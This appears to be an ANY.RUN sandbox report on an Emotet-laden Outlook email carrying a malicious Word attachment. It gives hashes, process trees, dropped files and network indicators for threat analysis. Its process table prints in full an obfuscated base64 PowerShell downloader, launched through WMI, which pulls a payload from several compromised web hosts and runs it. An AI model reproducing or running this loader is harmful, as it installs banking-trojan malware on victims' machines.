Malware analysis RE WG 36.18.0618291 Invent Umwelt und Verfahrenstechnik AG Beauftragung Entnahme Proben.msg Malicious activity

Add for printing

File name:	RE WG 36.18.0618291 Invent Umwelt und Verfahrenstechnik AG Beauftragung Entnahme Proben.msg
Full analysis:	https://app.any.run/tasks/d33c9dee-1794-4e77-91e5-04340b1c7e91
Verdict:	Malicious activity
Threats:	Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns. Malware Trends Tracker >>>
Analysis date:	June 19, 2019, 12:57:03
OS:	Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:	emotet-doc emotet
Indicators:
MIME:	application/vnd.ms-outlook
File info:	CDFV2 Microsoft Outlook Message
MD5:	DFD8AE7D67E626CB6ED1F9E04092C217
SHA1:	94725CBA95EEEF9398390C53312C5C71608F03D5
SHA256:	F0638551800BD65669D0745F8E4397C69C6BA567E0505CF89EE5E5E76F89D87F
SSDEEP:	6144:faWB477HUUUUUUUUUUUUUUUUUUUT52VnmAeZd+xuOj55:e77HUUUUUUUUUUUUUUUUUUUTCnHeZd+F

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

Launch configuration

Task duration:: 60 seconds
Heavy Evasion option:: off
Network geolocation:: off
Additional time used:: none
MITM proxy:: off
Privacy:: Public submission
Fakenet option:: off
Route via Tor:: off
Autoconfirmation of UAC:: on
Network:: on

Software preset

Internet Explorer 8.0.7601.17514 undefined
Adobe Acrobat Reader DC MUI (15.023.20070)
Adobe Flash Player 26 ActiveX (26.0.0.131)
Adobe Flash Player 26 NPAPI (26.0.0.131)
Adobe Flash Player 26 PPAPI (26.0.0.131)
Adobe Refresh Manager (1.8.0)
CCleaner (5.35)
FileZilla Client 3.36.0 (3.36.0)
Google Chrome (73.0.3683.75)
Google Update Helper (1.3.33.23)
Java 8 Update 92 (8.0.920.14)
Java Auto Updater (2.8.92.14)
Microsoft .NET Framework 4.6.1 (4.6.01055)
Microsoft Office Access MUI (English) 2010 (14.0.6029.1000)
Microsoft Office Access Setup Metadata MUI (English) 2010 (14.0.6029.1000)
Microsoft Office Excel MUI (English) 2010 (14.0.6029.1000)
Microsoft Office OneNote MUI (English) 2010 (14.0.6029.1000)
Microsoft Office Outlook MUI (English) 2010 (14.0.6029.1000)
Microsoft Office PowerPoint MUI (English) 2010 (14.0.6029.1000)
Microsoft Office Professional 2010 (14.0.6029.1000)
Microsoft Office Proof (English) 2010 (14.0.6029.1000)
Microsoft Office Proof (French) 2010 (14.0.6029.1000)
Microsoft Office Proof (Spanish) 2010 (14.0.6029.1000)
Microsoft Office Proofing (English) 2010 (14.0.6029.1000)
Microsoft Office Publisher MUI (English) 2010 (14.0.6029.1000)
Microsoft Office Shared MUI (English) 2010 (14.0.6029.1000)
Microsoft Office Shared Setup Metadata MUI (English) 2010 (14.0.6029.1000)
Microsoft Office Single Image 2010 (14.0.6029.1000)
Microsoft Office Word MUI (English) 2010 (14.0.6029.1000)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (9.0.30729.6161)
Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (10.0.40219)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (12.0.30501.0)
Microsoft Visual C++ 2013 x86 Additional Runtime - 12.0.21005 (12.0.21005)
Microsoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 (12.0.21005)
Microsoft Visual C++ 2017 Redistributable (x86) - 14.15.26706 (14.15.26706.0)
Microsoft Visual C++ 2017 x86 Additional Runtime - 14.15.26706 (14.15.26706)
Microsoft Visual C++ 2017 x86 Minimum Runtime - 14.15.26706 (14.15.26706)
Mozilla Firefox 65.0.2 (x86 en-US) (65.0.2)
Notepad++ (32-bit x86) (7.5.1)
Opera 12.15 (12.15.1748)
Skype version 8.29 (8.29)
VLC media player (2.2.6)
WinRAR 5.60 (32-bit) (5.60.0)

Hotfixes

Client LanguagePack Package
Client Refresh LanguagePack Package
CodecPack Basic Package
Foundation Package
IE Troubleshooters Package
InternetExplorer Optional Package
KB2534111
KB2999226
KB976902
LocalPack AU Package
LocalPack CA Package
LocalPack GB Package
LocalPack US Package
LocalPack ZA Package
ProfessionalEdition
UltimateEdition

Add for printing

MALICIOUS
No malicious indicators.
SUSPICIOUS
- Reads Internet Cache Settings
  - OUTLOOK.EXE (PID: 3932)
- Starts Microsoft Office Application
  - WINWORD.EXE (PID: 2324)
  - OUTLOOK.EXE (PID: 3932)
- PowerShell script executed
  - powErSHell.exe (PID: 460)
- Executed via WMI
  - powErSHell.exe (PID: 460)
- Application launched itself
  - WINWORD.EXE (PID: 2324)
- Creates files in the user directory
  - powErSHell.exe (PID: 460)
  - OUTLOOK.EXE (PID: 3932)
INFO
- Creates files in the user directory
  - WINWORD.EXE (PID: 2324)
- Reads Microsoft Office registry keys
  - WINWORD.EXE (PID: 3140)
  - WINWORD.EXE (PID: 2324)
  - OUTLOOK.EXE (PID: 3932)

Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report

Add for printing

No Malware configuration.

Add for printing

TRiD

.msg	\|	Outlook Message (41.3)
.oft	\|	Outlook Form Template (24.1)
.doc	\|	Microsoft Word document (18.6)
.doc	\|	Microsoft Word document (old ver.) (11)

No data.

Add for printing

All screenshots are available in the full report

Add for printing

Total processes

Monitored processes

Malicious processes

Suspicious processes

Behavior graph

Click at the process to see the details

Process information

PID	CMD	Path	Indicators	Parent process
3932	"C:\Program Files\Microsoft Office\Office14\OUTLOOK.EXE" /f "C:\Users\admin\AppData\Local\Temp\RE WG 36.18.0618291 Invent Umwelt und Verfahrenstechnik AG Beauftragung Entnahme Proben.msg"	C:\Program Files\Microsoft Office\Office14\OUTLOOK.EXE		explorer.exe
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Outlook Version: 14.0.6025.1000
2324	"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Outlook\7KMB110D\Rech_N_145_QT9441.doc"	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	—	OUTLOOK.EXE
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000
3140	"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Embedding	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	—	WINWORD.EXE
User: admin Company: Microsoft Corporation Integrity Level: LOW Description: Microsoft Word Exit code: 0 Version: 14.0.6024.1000
460	powErSHell -e JABjADYAOQA1ADMANwAyADQAPQAnAEkANAA0ADIAOQA4ADcANwAnADsAJABmADEANgAyADEAMQAwADAAIAA9ACAAJwA2ADUANgAnADsAJABXADgAXwA4ADYANwA9ACcAVQA4ADMANwAzADYAMAA2ACcAOwAkAE4AMQA2AF8ANwAyADMAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAJwBcACcAKwAkAGYAMQA2ADIAMQAxADAAMAArACcALgBlAHgAZQAnADsAJABQADYAOQA4ADAANwA9ACcAUAA1ADUANgA0ADMAMAA3ACcAOwAkAFMAMwAyAF8ANwAyAD0ALgAoACcAbgBlAHcALQBvAGIAagAnACsAJwBlACcAKwAnAGMAdAAnACkAIABuAGUAdAAuAFcAYABlAEIAYABDAEwAaQBFAE4AVAA7ACQAVgA4ADMAOAA0ADYAPQAnAGgAdAB0AHAAOgAvAC8AZQBhAGQAaABtAC4AYwBvAG0ALwBwAHUAYgBsAGkAYwBfAGgAdABtAGwALwBGAEoAQwBEAFMAegBVAGYAbQAvAEAAaAB0AHQAcAA6AC8ALwB3AHcAdwAuAGMAYQB0AC0AcwBjAGgAbwBvAGwALgByAHUALwB1AHMALwA3ADEAMAB5AGYAMABuAF8AdQBhADcAeAA0AGoALQA3ADQANwA5ADkAOQA0AC8AQABoAHQAdABwADoALwAvAHcAdwB3AC4AYQBoAG8AcgBhAHMAZQBnAHUAcgBvAC4AZABtAGMAaQBuAHQAbAAuAGMAbwBtAC8AdwBwAC0AYQBkAG0AaQBuAC8AVgB5AHoAZgBEAFUASgBEAC8AQABoAHQAdABwADoALwAvAHcAdwB3AC4AYwBhAG4AZABhAHMAeQBhAHAAaQAuAGMAbwBtAC8AYwBnAGkALQBiAGkAbgAvAGsAYgBkADMAbwA2AGEAaQBrAF8AbgA2AGcAdABkAGIAdgAtADUANQAvAEAAaAB0AHQAcAA6AC8ALwBkAG8AbQB1AHMAdwBlAGEAbAB0AGgALgBrAGEAeQBhAGsAbwBkAGUAdgAuAGMAbwBtAC8AdwBwAC0AYwBvAG4AdABlAG4AdAAvAHUAcABsAG8AYQBkAHMALwByAEwARABjAEMAeQBBAHUAYgBNAC8AJwAuAHMAUABMAGkAdAAoACcAQAAnACkAOwAkAHMAOAA4ADEAMwA3ADIAXwA9ACcARQA4ADAAMwBfADMANABfACcAOwBmAG8AcgBlAGEAYwBoACgAJABvADUANgAyAF8AMQAgAGkAbgAgACQAVgA4ADMAOAA0ADYAKQB7AHQAcgB5AHsAJABTADMAMgBfADcAMgAuAGQAbwBXAE4AbABPAGEARABGAEkAbABFACgAJABvADUANgAyAF8AMQAsACAAJABOADEANgBfADcAMgAzACkAOwAkAHMANQA1ADkANAA2ADQAMAA9ACcAagA3ADUAMQA3ADAAJwA7AEkAZgAgACgAKAAmACgAJwBHACcAKwAnAGUAdAAnACsAJwAtAEkAdABlAG0AJwApACAAJABOADEANgBfADcAMgAzACkALgBsAEUAbgBnAHQAaAAgAC0AZwBlACAAMwAxADgAMwA1ACkAIAB7ACYAKAAnAEkAbgB2ACcAKwAnAG8AawBlACcAKwAnAC0ASQB0AGUAbQAnACkAIAAkAE4AMQA2AF8ANwAyADMAOwAkAEsANwAwADcANgA4AD0AJwBKADcAMQAwAF8AMQA1ACcAOwBiAHIAZQBhAGsAOwAkAFEAXwA4ADgAMwAzADcAPQAnAFkANAAwADcAMQA4ACcAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAFEAMgBfADkAMAAyADgAMQA9ACcAVQAyADkANgAxADEAJwA=	C:\Windows\System32\WindowsPowerShell\v1.0\powErSHell.exe		wmiprvse.exe
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255)

Add for printing

Total events

3 422

Read events

2 535

Write events

Delete events

Modification events

No data

Add for printing

Executable files

Suspicious files

Text files

Unknown types

Dropped files

PID	Process	Filename		Type
3932	OUTLOOK.EXE	C:\Users\admin\AppData\Local\Temp\CVR3EA2.tmp.cvr		—
		MD5:—	SHA256:—
3932	OUTLOOK.EXE	C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Outlook\7KMB110D\Rech_N_145_QT9441 (2).doc\:Zone.Identifier:$DATA		—
		MD5:—	SHA256:—
2324	WINWORD.EXE	C:\Users\admin\AppData\Local\Temp\CVR5E21.tmp.cvr		—
		MD5:—	SHA256:—
2324	WINWORD.EXE	C:\Users\admin\AppData\Local\Temp\OICE_6C552BF8-2E53-4DE9-B71B-B38FCF2C2BC2.0\B9BE02CC.doc\:Zone.Identifier:$DATA		—
		MD5:—	SHA256:—
3140	WINWORD.EXE	C:\Users\admin\AppData\Local\Temp\OICE_6C552BF8-2E53-4DE9-B71B-B38FCF2C2BC2.0\~DFE6C96C56C1DE9008.TMP		—
		MD5:—	SHA256:—
460	powErSHell.exe	C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\529B52IX1AI1799SX49D.temp		—
		MD5:—	SHA256:—
3932	OUTLOOK.EXE	C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$rmalEmail.dotm		pgc
		MD5:BA578C720AA10D2A801A37BB85189A6A	SHA256:1E797D6D6947A9422AAC62672FC560E3EB39D1C619A6477B57A8D88214D0CEA5
3932	OUTLOOK.EXE	C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Outlook\7KMB110D\Rech_N_145_QT9441.doc		document
		MD5:C704D42B1FE8F1C96E56E9BC8973DF6E	SHA256:CBC3A6E52E1B33304323011EBAEFC554CDD7982055FE5A74A20773DED92CB1FE
3932	OUTLOOK.EXE	C:\Users\admin\AppData\Local\Temp\StructuredQuery.log		text
		MD5:2EF858D94D9D003B742E7770D4DA0CEB	SHA256:2A971B42990E73025680813B0E919D2BF0D9322B31AE5F2E00DD21D954410B35
2324	WINWORD.EXE	C:\Users\admin\AppData\Local\Temp\OICE_6C552BF8-2E53-4DE9-B71B-B38FCF2C2BC2.0\B9BE02CC.doc		document
		MD5:C704D42B1FE8F1C96E56E9BC8973DF6E	SHA256:CBC3A6E52E1B33304323011EBAEFC554CDD7982055FE5A74A20773DED92CB1FE

Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Add for printing

HTTP(S) requests

TCP/UDP connections

DNS requests

Threats

HTTP requests

PID	Process	Method	HTTP Code	IP	URL	CN	Type	Size	Reputation
3932	OUTLOOK.EXE	GET	—	64.4.26.155:80	http://config.messenger.msn.com/config/msgrconfig.asmx?op=GetOlcConfig	US	—	—	whitelisted
460	powErSHell.exe	GET	500	5.196.201.123:80	http://www.candasyapi.com/cgi-bin/kbd3o6aik_n6gtdbv-55/	FR	—	—	suspicious
460	powErSHell.exe	GET	—	37.59.31.76:80	http://domuswealth.kayakodev.com/cgi-sys/suspendedpage.cgi	FR	—	—	suspicious
460	powErSHell.exe	GET	302	37.59.31.76:80	http://domuswealth.kayakodev.com/wp-content/uploads/rLDcCyAubM/	FR	html	242 b	suspicious
460	powErSHell.exe	GET	403	31.31.196.252:80	http://www.cat-school.ru/us/710yf0n_ua7x4j-7479994/	RU	html	4.00 Kb	suspicious
460	powErSHell.exe	GET	200	91.238.72.69:80	http://cluster1.easy-hebergement.net/	FR	html	857 b	malicious
460	powErSHell.exe	GET	200	173.254.28.54:80	http://www.ahoraseguro.dmcintl.com/cgi-sys/suspendedpage.cgi	US	html	7.43 Kb	unknown
460	powErSHell.exe	GET	302	91.238.72.69:80	http://eadhm.com/public_html/FJCDSzUfm/	FR	html	221 b	malicious
460	powErSHell.exe	GET	302	173.254.28.54:80	http://www.ahoraseguro.dmcintl.com/wp-admin/VyzfDUJD/	US	html	321 b	unknown

Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID	Process	IP	Domain	ASN	CN	Reputation
3932	OUTLOOK.EXE	64.4.26.155:80	config.messenger.msn.com	Microsoft Corporation	US	whitelisted
460	powErSHell.exe	5.196.201.123:80	www.candasyapi.com	OVH SAS	FR	suspicious
460	powErSHell.exe	173.254.28.54:80	www.ahoraseguro.dmcintl.com	Unified Layer	US	unknown
460	powErSHell.exe	31.31.196.252:80	www.cat-school.ru	Domain names registrar REG.RU, Ltd	RU	malicious
460	powErSHell.exe	37.59.31.76:80	domuswealth.kayakodev.com	OVH SAS	FR	suspicious
460	powErSHell.exe	91.238.72.69:80	eadhm.com	Mediactive SAS	FR	malicious

DNS requests

Domain	IP	Reputation
config.messenger.msn.com	64.4.26.155	whitelisted
eadhm.com	91.238.72.69	malicious
cluster1.easy-hebergement.net	91.238.72.69	malicious
www.cat-school.ru	31.31.196.252	suspicious
www.ahoraseguro.dmcintl.com	173.254.28.54	unknown
www.candasyapi.com	5.196.201.123	suspicious
domuswealth.kayakodev.com	37.59.31.76	suspicious

Threats

No threats detected

Add for printing

No debug info

General Info

RE WG 36.18.0618291 Invent Umwelt und Verfahrenstechnik AG Beauftragung Entnahme Proben.msg

DFD8AE7D67E626CB6ED1F9E04092C217

94725CBA95EEEF9398390C53312C5C71608F03D5

F0638551800BD65669D0745F8E4397C69C6BA567E0505CF89EE5E5E76F89D87F

6144:faWB477HUUUUUUUUUUUUUUUUUUUT52VnmAeZd+xuOj55:e77HUUUUUUUUUUUUUUUUUUUTCnHeZd+F

Software environment set and analysis options

Launch configuration

Software preset

Hotfixes

Behavior activities

MALICIOUS

SUSPICIOUS

Reads Internet Cache Settings

Starts Microsoft Office Application

PowerShell script executed

Executed via WMI

Application launched itself

Creates files in the user directory

INFO

Creates files in the user directory

Reads Microsoft Office registry keys

Malware configuration

Static information

TRiD

Video and screenshots

Processes

Behavior graph

Specs description

Process information

Information

Information

Information

Information

Registry activity

Modification events

Files activity

Dropped files

Network activity

HTTP requests

Connections

DNS requests

Threats

Debug output strings